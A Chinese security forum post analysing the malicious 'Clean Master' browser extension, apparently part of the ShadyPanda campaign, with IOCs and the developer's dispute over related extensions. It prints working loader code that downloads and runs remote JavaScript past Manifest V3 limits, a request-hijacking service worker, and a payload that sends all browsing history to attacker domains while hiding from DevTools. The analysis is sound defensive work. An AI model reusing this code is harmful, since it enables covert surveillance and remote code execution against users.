首页
课程
问答
CTF
社区
招聘
峰会
发现
排行榜
知识库
工具下载
看雪20年
看雪商城
证书查询
登录
注册
首页
社区
课程
招聘
发现
问答
CTF
排行榜
知识库
工具下载
峰会
看雪商城
证书查询
社区
WEB安全
发新帖
2
5
[原创] Clean Master恶意浏览器插件样本分析
发表于: 2025-12-3 10:36
12959
[原创] Clean Master恶意浏览器插件样本分析
SecureNexusLab
2025-12-3 10:36
12959
## 1. 背景与概述 昨晚正和小伙伴愉快地聊天,突然听他说自己常用的 Infinity 插件被 Edge 浏览器标记为恶意软件,直接给禁用了。边沟通边搜集资料,发现国外安全团队 Koi Security 发布了一份关于浏览器恶意插件的披露报告,揭露了一个名为 ShadyPanda的威胁组织。该组织策划并实施了长达七年的恶意网络活动,插件最初提供合法的数据清理功能,甚至曾获得官方应用商店的推荐,但攻击者后期利用平台对更新包审核机制宽松的问题,在后续版本中植入了恶意代码。 本着“吃瓜吃到自己身上”的原则,我检查了一下自己的浏览器扩展列表。好家伙,赫然发现自己电脑上也躺着一个报告里的核心恶意插件——**Clean Master** 喜提恶意样本一个!那只能边哭边把这个样本给分析了,恶意文件放在了后台,可以私信 `Clean Master` 获取 ## 2. 样本信息 - **名称**: Clean Master - **版本**: 22.9.29.1452 - **核心恶意文件**: `background/fuck.js`, `background/interpreter.js`, `background\encrypt-bundle.js` ## 3. 静态代码分析 ### 3.1 入口与权限 (`manifest.json` & `background/bg.js`) `manifest.json` 申请了极高的权限,包括对所有网站的访问权 (`<all_urls>`) 和拦截网络请求的能力 (`webRequest`)。 ```json { "host_permissions": ["<all_urls>"], "permissions": [ "browsingData", // 访问浏览数据 "background", // 后台运行 "storage", // 无限存储 "webNavigation", // 监控导航 "webRequest" // 拦截请求 ] } ``` 插件的后台服务 (`service_worker`) 指向 `background/bg.js`。 在 `background/bg.js` 中,第一行代码即暴露了其恶意意图: ```javascript importScripts("/background/fuck.js","/lib/js/lib.js","/background/bg-setting.js", ...); ``` 它在初始化正常功能之前,优先加载了名为 `fuck.js` 的恶意脚本。 ### 3.2 恶意加载器核心逻辑 (`background/fuck.js`) 这是该样本的核心恶意组件,负责与 C2 服务器通信、下载并执行 Payload。 #### 3.2.1 C2 通信与 Payload 下载 脚本定义了一个异步函数 `xxx`,向硬编码的 C2 地址发起请求: ```javascript const xxx=async()=>{ let e=await get(key); // 检查是否需要更新(每小时更新一次) if(!e||!e.nextUpdateTime||e.nextUpdateTime<Date.now()){ // 从远程服务器获取恶意代码配置 const t=await fetch("https://api.extensionplay.com/clean_master/t.json?t="+Date.now()) .then(e=>e.json()); // 下载远程代码 await Promise.all(t.map(r=>new Promise((e,t)=>{ if(!r.src_str&&r.src){ const n=new URL(r.src); n.searchParams.set("t",Date.now()), fetch(n.toString()).then(e=>e.ok&&e.text()) .then(e=>e&&(r.src_str=e)).then(e).catch(t) }else e() }))) // 设置下次更新时间为1小时后 e={nextUpdateTime:Date.now()+36e5,data:t}, await set(key,e) } // 执行下载的代码 runOnce||(runOnce=!0,e.data.forEach(e=>{ if(Array.isArray(e.run_on)){ if(!e.run_on.includes("bg"))return }else if("bg"!==e.run_on)return; e.src_str&&interpreter.run(e.src_str,globalThis||self||window||{}) })) } ``` - **更新频率**: 代码中设置了 `nextUpdateTime`,默认每 **1 小时**(36e5 毫秒)检查一次更新。 - **数据获取**: 获取的 JSON 数据包含待执行代码的 URL (`src`),脚本会进一步 fetch 该 URL 获取实际的代码字符串,并将其存入 `src_str` 字段。 - **数据存储**:`set(key,e)` 在逻辑位置存储到了浏览器的本地扩展存储区 (chrome.storage.local),物理位置保存在浏览器用户配置文件目录下的 LevelDB 数据库文件中,具体路径通常位于:.../User Data/Default/Local Extension Settings/<插件ID> #### 3.2.2 CSP 绕过与代码执行 为了规避 Manifest V3 禁止使用 `eval` 或 `new Function` 执行远程代码的安全策略,攻击者引入了一个用 JavaScript 编写的 JS 解释器 (`interpreter.js`): ```javascript importScripts("/background/encrypt-bundle.js", "/background/interpreter.js"); // ... e.data.forEach((e) => { if (Array.isArray(e.run_on)) { if (!e.run_on.includes("bg")) return; } else if ("bg" !== e.run_on) return; // 使用解释器执行远程代码 e.src_str && interpreter.run(e.src_str, globalThis || self || window || {}); }) ``` fuck.js 中还有个监听分发机制,`startListener` 监听 `chrome.runtime.onMessage`,这是 Chrome 插件各组件间通信的标准方式。当插件的其他组件发送消息并携带 run_on 参数时,`startListener` 会查询本地缓存的恶意配置,筛选出所有 run_on 字段匹配请求方环境的配置项,筛选出的恶意代码(包含源码字符串 src_str)会被通过 `sendResponse` 发回给请求方。这个函数并没有被显式调用,感觉更像是恶意代码分发服务中台、当插件的其他上下文需要执行恶意代码时,它们会向后台发送请求,startListener 负责根据请求方的运行环境(run_on)筛选并返回对应的恶意 Payload,猜测可能是为了后续定向攻击留存的吧,毕竟恶意代码也可以定期下发,可以每次接收不同的恶意代码,收集更多类型的信息。 ``` //... async function startListener() { chrome.runtime.onMessage.addListener(function (r, e, s) { return ( get(key) // key = "fuck",从本地存储读取恶意配置 .then((e) => { const t = (e && e.data) || [], // 获取 Payload 数组 n = r["run_on"]; // 从消息中获取请求的 run_on 类型 s( t.filter((e) => { if (Array.isArray(e.run_on)) { if (e.run_on.includes(n)) return !0; } else if (e.run_on === n) return !0; }) ); }) .catch(noop), !0 ); }); } ``` #### 3.2.3 中间人攻击与资源劫持 (Official Analysis Code Basis) 官方分析中提到的“中间人攻击:通过 service worker 可拦截和修改网络请求,用恶意脚本替换合法的 JavaScript 文件”的机制,其代码依据主要位于 `background/fuck.js` 文件中。 这段代码利用了 Service Worker 的 `fetch` 事件监听器,拦截对插件自身资源的请求,并将其替换为从远程服务器下载的恶意代码。 ```javascript self.addEventListener("fetch", (e) => { if (fuckDataArr) { const n = e.request; // 1. 检查请求的 URL 是否匹配配置中的 proxy_url var t = fuckDataArr.find( (e) => chrome.runtime.getURL(e.proxy_url) === n.url ); // 2. 如果匹配成功(即目标是插件的某个合法文件) if (t) { const r = new Headers(); "css" === t.type ? r.set("Content-Type", "text/css") : r.set("Content-Type", "text/javascript"), // 3. 实施“中间人攻击”: // 不让请求去加载本地磁盘上的真实文件,而是直接返回内存中缓存的恶意代码 (t.src_str) e.respondWith(new Response(t.src_str, { headers: r })); } } }); ``` **攻击原理分析**: 1. **拦截请求**: `self.addEventListener("fetch", ...)` 是 Service Worker 的标准 API,用于拦截当前作用域下的所有网络请求。 2. **恶意替换**: `e.respondWith(new Response(t.src_str, ...))` 是攻击的核心。`t.src_str` 是之前从 C2 服务器 (`api.extensionplay.com`) 下载并存储在本地的恶意代码字符串。当浏览器尝试加载插件内的某个合法文件(如 `lib/js/lib.js`,由 `e.proxy_url` 指定)时,Service Worker 会直接返回这个恶意字符串,而不是文件系统中的原始文件。 3. **危害后果**: 通过上述替换,攻击者可以将原本无害的功能脚本替换为窃取 Cookie 或注入广告的恶意脚本。由于这些脚本运行在扩展的上下文中或被注入到页面中,拥有极高的权限,可以访问敏感数据,从而实施凭证窃取、会话劫持等攻击。 ### 3.3 执行引擎 (`background/interpreter.js`) 一个完整的 JavaScript 解释器实现,专门用于在 MV3 扩展等受限环境中执行动态下发的代码,绕过 CSP 限制。攻击者可在不更新插件的情况下随时改变攻击逻辑。 ### 3.4 辅助模块 #### 3.4.1 加密库 (`background/encrypt-bundle.js`) 打包好的 **CryptoJS** 密码学库,提供 AES、SHA 等加密算法,用于解密 C2 下发的 Payload 及加密窃取数据后回传。 #### 3.4.2 伪装的追踪器拦截 (`background/tracker.js`) 精心设计的"伪装模块",让插件看起来像合法隐私保护工具。 **关键发现 - 被动监测而非拦截**: 代码注册 `chrome.webRequest.onBeforeRequest` 监听器,但**未申请** `["blocking"]` 权限: ```javascript chrome.webRequest.onBeforeRequest.addListener(t=>{ var{tabId:t,url:e,type:r,initiator:i,frameId:a}=t; // ... 逻辑判断 ... if(e){ const o=trackerMap[t]||{}; // 仅仅是将域名加入列表 o.trackerList.includes(a)||(o.trackerList.push(a),trackerMap[t]=o) } },{urls:["http://*/*","https://*/*"]}) // 缺少 ["blocking"] ``` 这意味着它无法真正拦截或取消网络请求,只能旁路监听,猜测可能为申请高危的 `webRequest` 和 `webNavigation` 权限提供正当理由,降低应用商店审核人员的警惕,并且还可以将访问的网站URL存储到本地,可以后续窃取。 **工作流程**: 1. 加载本地规则文件 `background/seed.json`。 2. 监听所有网络请求,判断是否为第三方请求。 3. 如果请求域名匹配规则中的 `"block"` 动作,它**仅仅**是将该域名记录到内存中的 `trackerMap` 对象里。 4. 通过 `getTrackerList` 消息接口,将记录的“追踪器”列表返回给前端(Popup 页面)。 ### 3.5 恶意 Payload 深度分析 (基于本地提取样本) 通过对本地 LevelDB 日志中提取的恶意代码 (`src_str`) 进行反混淆与分析,还原了该 Payload 的完整攻击逻辑。 **提取的配置结构** (来自 LevelDB 日志 `012834.log`): ```json { "data": [ { "match": "\\.baidu.com$", "proxy_url": "/baidu.js", "run_on": "bg", "src": "https://api.extensionplay.com/js/encrypt-statistics-v3.js", "src_str": "var key = \"2646294A404E635266546A576E5A7234\";\nvar consoleCount = {};\n\nchrome.runtime.onMessage.addListener(function (msg) {\n if (msg.type === \"on-devtools-open\") {\n if (consoleCount.hasOwnProperty(msg.id)) {\n clearTimeout(consoleCount[msg.id]);\n }\n consoleCount[msg.id] = setTimeout(function () {\n delete consoleCount[msg.id];\n chrome.storage.local.set({ consoleCount: consoleCount });\n }, 1100);\n chrome.storage.local.set({ consoleCount: consoleCount });\n }\n});\n\nvar Statistics = {\n apiList: [\"https://api.cleanmasters.store\"],\n uuid: \"\",\n refs: {},\n init: function () {\n this.getUUIDfromStore();\n\n chrome.webRequest.onCompleted.addListener(\n this.handlerOnCompletedWebRequest.bind(this),\n {\n urls: [\"<all_urls>\"],\n types: [\"main_frame\"],\n }\n );\n },\n\n handlerOnCompletedWebRequest: function (x) {\n this.sendData({\n user_id: this.uuid,\n target_url: encodeURI(x.url),\n referrer_url: this.refs[x.tabId] || x.initiator,\n user_agent: navigator.userAgent,\n method: x.method,\n status_code: x.statusCode,\n ext_id: chrome.runtime.id,\n client_timestamp: x.timeStamp,\n });\n\n this.refs[x.tabId] = encodeURI(x.url);\n },\n\n getUUIDfromStore: function () {\n var self = this;\n chrome.storage.sync.get([\"uuid\"], function (data) {\n self.uuid = data.uuid =\n data.uuid && self.validateUUID4(data.uuid)\n ? data.uuid\n : self.makeUUID();\n chrome.storage.sync.set({ uuid: data.uuid }, function () {});\n });\n },\n\n validateUUID4: function (t) {\n return new RegExp(\n /^[0-9A-F]{8}-[0-9A-F]{4}-4[0-9A-F]{3}-[89AB][0-9A-F]{3}-[0-9A-F]{12}$/i\n ).test(t);\n },\n\n makeUUID: function () {\n return \"xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx\".replace(\n /[xy]/g,\n function (t, e) {\n return (\n \"x\" == t ? (e = (16 * Math.random()) | 0) : (3 & e) | 8\n ).toString(16);\n }\n );\n },\n\n sendData: function (t) {\n var self = this;\n chrome.storage.local.get(\"consoleCount\", function (data) {\n if (!data.consoleCount || Object.keys(data.consoleCount).length < 1) {\n var q = {\n data: JSON.stringify(t),\n };\n\n try {\n q.data = browserify_bridge.encode(q.data, key);\n q.type = \"v3\";\n } catch (err) {\n q.data = btoa(q.data);\n }\n\n var requests = self.apiList.map(function (api) {\n return fetch(api + \"/abc\", {\n method: \"post\",\n headers: {\n \"Content-Type\": \"application/json;charset=utf-8\",\n },\n body: JSON.stringify(q),\n });\n });\n\n var requestsPromise = Promise.allSettled(requests);\n requestsPromise.catch(function () {});\n }\n });\n },\n};\n\nStatistics.init();\n" } ], "nextUpdateTime": 1750218220829.0 } ``` - **关于 `match` 字段的说明**: 在提取的配置中存在 `"match": "\\.baidu.com$"` 字段,但经审计发现: 1. **静态代码中未使用**: 在 `fuck.js` 的 Service Worker 逻辑中,并未发现任何使用该正则表达式进行 URL 匹配的代码。 2. **当前 Payload 为全量监控**: 提取到的 `src_str` 代码使用 `urls: ["<all_urls>"]` 监听所有网站流量,而非仅针对 `baidu.com`。 3. **字段用途存疑**: `match` 字段可能是 C2 配置框架的保留字段,用于服务端管理、未来功能扩展,或用于其他未被提取到的 Payload 配置中。由于 C2 服务器已不可访问,无法获取完整的配置历史,其确切用途尚不明确。 #### 3.5.1 反分析与逃逸机制 代码中包含一段针对开发者工具 (DevTools) 的检测逻辑,用于在安全分析人员调试时隐藏恶意行为。 ```javascript chrome.runtime.onMessage.addListener(function (msg) { if (msg.type === "on-devtools-open") { // ... 更新 consoleCount 状态 ... chrome.storage.local.set({ consoleCount: consoleCount }); } }); // 在发送数据前检查 sendData: function (t) { chrome.storage.local.get("consoleCount", function (data) { // 如果检测到 DevTools 开启 (consoleCount 不为空),则停止发送数据 if (!data.consoleCount || Object.keys(data.consoleCount).length < 1) { // ... 执行发送逻辑 ... } }); } ``` - **原理**: 插件监听 `on-devtools-open` 消息(可能由插件的其他组件触发),一旦检测到开发者工具开启,就在本地存储中标记。 - **目的**: 在 `sendData` 函数中,代码会检查这个标记。如果发现正在被调试,它会直接**静默停止数据回传**,导致分析人员抓不到网络包。 #### 3.5.2 全流量数据窃取 Payload 注册了 `chrome.webRequest.onCompleted` 监听器,监控浏览器中所有的主框架 (`main_frame`) 请求。 ```javascript chrome.webRequest.onCompleted.addListener( this.handlerOnCompletedWebRequest.bind(this), { urls: ["<all_urls>"], // 监听所有 URL types: ["main_frame"], } ); ``` 窃取的数据字段极其详尽,足以完整画像用户的浏览行为: ```javascript handlerOnCompletedWebRequest: function (x) { this.sendData({ user_id: this.uuid, //用户唯一标识 target_url: encodeURI(x.url), //目标 URL referrer_url: this.refs[x.tabId] || x.initiator, //来源 URL user_agent: navigator.userAgent, //User Agent method: x.method, //HTTP 方法 status_code: x.statusCode, //状态码 ext_id: chrome.runtime.id, // 当前恶意插件的唯一 ID client_timestamp: x.timeStamp, //记录数据被窃取的精确时间 }); } ``` #### 3.5.3 持久化身份追踪 代码会生成一个 UUID 并存储在 `chrome.storage.sync` 中。 ```javascript chrome.storage.sync.get(["uuid"], function (data) { self.uuid = data.uuid = data.uuid ? data.uuid : self.makeUUID(); chrome.storage.sync.set({ uuid: data.uuid }, function () {}); }); ``` - **危害**: 使用 `storage.sync` 意味着这个唯一的追踪 ID 会随着用户的 Google/Edge 账号同步到所有设备。攻击者不仅能追踪单台设备,还能跨设备关联用户的身份。 #### 3.5.4 加密数据回传 - **C2 服务器**: `<mark class="encrypted">557K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6S2M7r3W2Q4x3X3g2U0L8r3g2S2L8X3#2S2M7%4c8W2M7Y4y4Q4x3X3g2K6N6r3!0J5k6g2)9J5c8X3q4T1j5#2)9$3x3l9`.`.</mark> - **加密方式**: 使用硬编码密钥 `2646294A404E635266546A576E5A7234` 对数据进行加密。 ```javascript var key = "2646294A404E635266546A576E5A7234"; // ... q.data = browserify_bridge.encode(q.data, key); // 加密 ``` ## 4. 攻击链复盘 1. **安装**: 用户安装伪装的插件。 2. **启动**: 浏览器加载 `background/bg.js`,随即加载 `background/fuck.js`。 3. **指令获取**: `fuck.js` 访问 `api.extensionplay.com` 获取配置。 4. **Payload 下载**: 根据配置下载恶意 JS 代码。 5. **执行**: 使用内置的 `interpreter.js` 执行下载的代码,或者通过 `fetch` 监听器劫持特定网络请求。 6. **恶意行为**: 执行具体的恶意逻辑,取决于动态下发的 Payload。虽然笔者尝试从恶意接口中下载样本失败,但在本地浏览器管理的 LevelDB 数据库中成功提取到了历史下载的恶意代码。 ## 5. 关联事件与争议说明 (WeTab / Infinity) 在本次披露的报告中,除了 **Clean Master** 被实锤包含恶意代码外,知名的 **WeTab** 和 **Infinity** 扩展也被列入了 ShadyPanda 组织的关联名单中。报告指控这些扩展可能涉及数据收集等行为(被称为“阶段 2”和“阶段 4”的活动)。 然而,针对这一指控及随后的下架处理,**WeTab 和 Infinity 官方已发布声明进行澄清**。为了保持客观中立,现将官方声明要点摘录如下,供读者参考: 1. **账号关联导致误伤**: 官方表示,WeTab 与 Infinity 的下架是因为它们与 Clean Master 曾使用**同一开发者账号**上架。当 Clean Master 因恶意代码被封禁时,平台出于风控策略,对该账号下的所有扩展采取了“连坐”措施。 2. **否认恶意行为**: 声明强调,WeTab 与 Infinity 的下架**并非**因为这两款扩展自身存在恶意代码或安全问题。 3. **代码安全承诺**: 官方承诺,用户本地已安装的 WeTab / Infinity 版本代码保持不变,**不存在临时植入后门或新增恶意行为的情况**。 4. **积极申诉中**: 目前开发团队已向平台提交了技术说明与安全自查结果,正在积极沟通以恢复上架。 **笔者注**: - 对于 **Clean Master**,本文的分析已证实其包含明确的恶意加载器 (`fuck.js`) 和 CSP 绕过机制 (`interpreter.js`),属于确凿的恶意软件。 - 对于 **WeTab / Infinity**,目前尚未在公开样本中发现与 Clean Master 相同的恶意加载器代码。建议用户关注官方后续的申诉结果及安全厂商的进一步分析。 ## 6. 威胁指标 (IOCs) - **C2 Domain**: - `api.extensionplay.com` (Clean Master 核心 C2) - `api.cleanmasters.store` (Payload 中发现的数据回传域名) - `cleanmasters.store` (报告提及的数据回传域名) * 更多的可以参考原文 - **URL**: - `<mark class="encrypted">de0K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6S2M7r3W2Q4x3X3g2W2P5s2c8W2L8Y4y4A6L8$3&6H3L8r3q4&6i4K6u0W2j5$3!0E0i4K6u0r3j5$3I4W2j5h3&6Q4y4h3k6E0j5i4y4@1k6i4u0Q4x3V1k6@1i4K6u0W2K9Y4y4G2L8W2)9$3x3l9`.`.</mark> - `<mark class="encrypted">c87K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6S2M7r3W2Q4x3X3g2U0L8r3g2S2L8X3#2S2M7%4c8W2M7Y4y4Q4x3X3g2K6N6r3!0J5k6g2)9J5c8X3q4T1j5#2)9$3x3l9`.`.</mark> (数据回传接口) - **Encryption Key**: `2646294A404E635266546A576E5A7234` (用于加密回传数据) - **恶意文件特征**: - 文件名: `fuck.js` - 本地存储 Key: `"fuck"` - 代码特征: 使用 `interpreter.run` 执行远程代码。 ## 7. 总结与碎碎念 这种攻击手法其实并没有那么复杂,主要利用了平台对更新的审查不严,但沉淀了这么久才开始动手。。。确实防不胜防 **最后给大伙儿提个醒:** 赶紧查查自己的浏览器插件列表,看到edge的插件封禁安全提示,就说明你有可能中招了,看看自己有没有安装Clean Master插件吧。 ## 参考链接 <mark class="encrypted">738K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2C8L8$3W2Q4x3X3g2S2K9g2)9J5c8X3u0D9L8$3N6Q4x3V1j5@1i4K6u0V1L8h3W2D9L8r3W2G2L8W2)9J5k6r3u0J5L8%4N6K6k6i4u0K6i4K6u0V1K9h3&6X3k6h3y4@1k6h3c8Q4x3X3c8A6L8Y4y4A6k6r3g2Q4x3X3c8K6K9r3q4V1P5i4m8S2L8X3c8S2i4K6u0V1y4#2)9J5k6s2W2W2j5i4u0Q4x3X3c8E0j5h3I4%4j5i4u0W2i4K6u0V1j5$3q4E0M7r3q4A6k6$3&6Q4x3U0y4Z5k6h3q4V1K9h3&6Y4i4K6u0V1x3b7`.`.</mark>
登录后可查看完整内容
传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!!
收藏
・
2
点赞
・
5
打赏
分享
分享到微信
分享到QQ
分享到微博
赞赏记录
参与人
雪币
留言
时间
wx_晨梦
这个讨论对我很有帮助,谢谢!
2026-7-16 08:17
mb_qhnraysx
感谢你的积极参与,期待更多精彩内容!
2025-12-9 13:31
郭小白
谢谢你的细致分析,受益匪浅!
2025-12-3 23:17
长白
谢谢你的细致分析,受益匪浅!
2025-12-3 22:18
mb_jepgtozh
感谢你的贡献,论坛因你而更加精彩!
2025-12-3 16:10
查看更多
赞赏
×
1 雪花
5 雪花
10 雪花
20 雪花
50 雪花
80 雪花
100 雪花
150 雪花
200 雪花
支付方式:
微信支付
赞赏留言:
快捷留言
感谢分享~
精品文章~
原创内容~
精彩转帖~
助人为乐~
感谢分享~
最新回复
(
3
)
SecureNexusLab
雪 币:
421
活跃值:
(95)
能力值:
( LV3,RANK:20 )
在线值:
发帖
5
回帖
3
粉丝
11
关注
私信
SecureNexusLab
2
楼
分析分享来源:SecureNexusLab团队核心成员TheBigBangTheory。
由于系统上传附件有点问题,附上分析附件材料地址:
cffK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6e0k6h3y4#2M7X3g2z5k6i4S2#2M7@1I4S2j5W2)9J5c8W2m8#2j5X3I4A6j5@1#2S2N6r3g2J5K9h3q4D9f1$3S2S2M7X3W2F1k6#2)9J5c8Y4c8J5k6h3g2Q4x3V1k6E0j5h3W2F1i4K6u0r3K9$3q4F1P5s2g2W2i4K6u0r3b7$3I4W2j5h3&6Q4x3U0f1J5x3p5#2S2M7%4c8W2M7R3`.`.
2025-12-3 10:53
0
git_2488821ni
雪 币:
10
能力值:
( LV1,RANK:0 )
在线值:
发帖
0
回帖
1
粉丝
0
关注
私信
git_2488821ni
3
楼
好东西,帮顶
2025-12-3 14:24
0
郭小白
雪 币:
227
能力值:
( LV1,RANK:0 )
在线值:
发帖
0
回帖
1
粉丝
0
关注
私信
郭小白
4
楼
感谢师傅分享
2025-12-3 23:17
0
游客
登录
|
注册
方可回帖
回帖
表情
雪币赚取及消费
高级回复
返回
SecureNexusLab
5
发帖
3
回帖
20
RANK
关注
私信
他的文章
[原创]腾讯云智能渗透挑战赛中AI First的学习与思考
5638
[原创]Claude 间接提示词注入恶意样本分析
8030
[原创]从 IoT 自动漏挖看智能体发展趋势:实测 DeepSeek-V4 VS Kimi 2.6 VS GPT 5.3 codex
10270
[分享][转帖][原创]7大顶会、150篇论文,2025 Agent 安全领域最全调研
3221
[原创] Clean Master恶意浏览器插件样本分析
12959
关于我们
联系我们
企业服务
看雪公众号
专注于PC、移动、智能设备安全研究及逆向工程的开发者社区
看原图
赞赏
×
雪币:
+
留言:
快捷留言
为你点赞!
返回
顶部